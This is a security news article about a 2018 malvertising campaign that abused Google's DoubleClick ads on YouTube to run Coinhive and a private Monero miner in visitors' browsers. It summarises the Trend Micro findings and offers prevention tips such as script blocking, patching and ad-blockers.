Google’s DoubleClick Ads on YouTube Used by Coinhive Miner

Coinhive miners emerged and became widely used in late 2017, and, since then, they have not gained a positive reaction from the public. Although Coinhive is meant to offer website owners a chance to make money without displaying advertisements, more and more instances where the miner is used by malicious parties are recorded. Last year, the miner was employed by the creators of a tech-support scam and the SafeBrowse extension. It was also found operated via WordPress and Magneto sites, as well as showtime.com and showtimeanytime.com. There is a full report explaining how exactly malicious parties can exploit Coinhive. This time, the suspicious miner has been linked to the Google’s DoubleClick service.

google1

A miner is a tool that is capable of exploiting system’s CPU resources for the sole purpose of mining cryptocurrency. This action creates virtual money out of thin air, and that is why both harmless and malicious parties are interested in it. Coinhive offers to mine Monero, which is comparable to Bitcoin, the most popular cryptocurrency in the world. According to the report by Trend Micro, detections of the miner increased by 285% when attackers were found exploiting Google’s DoubleClick service. The uncovered malvertising campaign was not only using Coinhive but also another miner connecting to a private pool. The attacker used two miner scripts and a script to show a DoubleClick ad. Although the advertisement is legitimate, the two embedded miners are connecting to the system’s computer processing power to mine Monero.

Researchers at Trend Micro discovered that the exploited ad “has a JavaScript code that generates a random number between variables 1 and 100. When it generates a variable above 10, it will call out coinhive.min.js to mine 80% of the CPU power.” According to the report, this happens 90% of the time. The private miner used by attackers behind the malvertising campaign called “mqoj_1.js” was taking over the remaining 10%. It is reported that most users affected by this lived in Japan, France, Taiwan, Italy, and Spain. This no longer appears to be the issue, considering that the traffic linked to the malvertising campaign diminished after 24th of January. According to A. Sulleyman at Independent, Google representatives reported blocking the affected advertisements in less than 2 hours after the mining activity was uncovered. Undoubtedly, Google will enforce protocols to ensure that this does not happen again; however, web miners are very new, and it is naive to state that further attacks can be prevented.

Speaking of prevention, there are steps that can be taken to ensure that web miners are under control. It is recommended to block JavaScript-based apps on web browsers. If that is taken care of, Coinhive miners do not stand a chance of exploiting the CPU resources to mine Monero. Those at risk also need to be diligent about updating software and patching vulnerabilities. Malvertising campaigns using Coinhive are not the only reason to do this. If software is outdated and security vulnerabilities are not patched, attackers could use various malicious tactics to compromise the content on websites, hijack the admin rights, embed malware, and do other malicious things.

Users might realize that the sites they visit or the ads they see are used for Monero mining by Coinhive because of the incredible CPU usage. It is easy to check the CPU usage via the Task Manager’s Performance menu. If the number is at 80% or above, there is a great possibility that a miner is activated. On the other hand, this could be a sign of malware too. In this case, of course, the user must scan their operating system to check for malware, and, if it exists, delete it ASAP. When it comes to miners, extensions are being offered for blocking them, but those are dubious. However, it is a great idea to install a trustworthy ad-blocker because it not only disables ads but also stops miners that rely on them.

References

Chen, J. C. and Liu, C. January 26, 2018. Malvertising Campaign Abuses Google’s DoubleClick to Deliver Cryptocurrency Miners. Trend Micro.
Sulleyman, A. January 30, 2018. Malicious YouTube Ads Secretly Slowed Down Computers and Earned Bitcoin Alternative Monero For Attackers. Independent.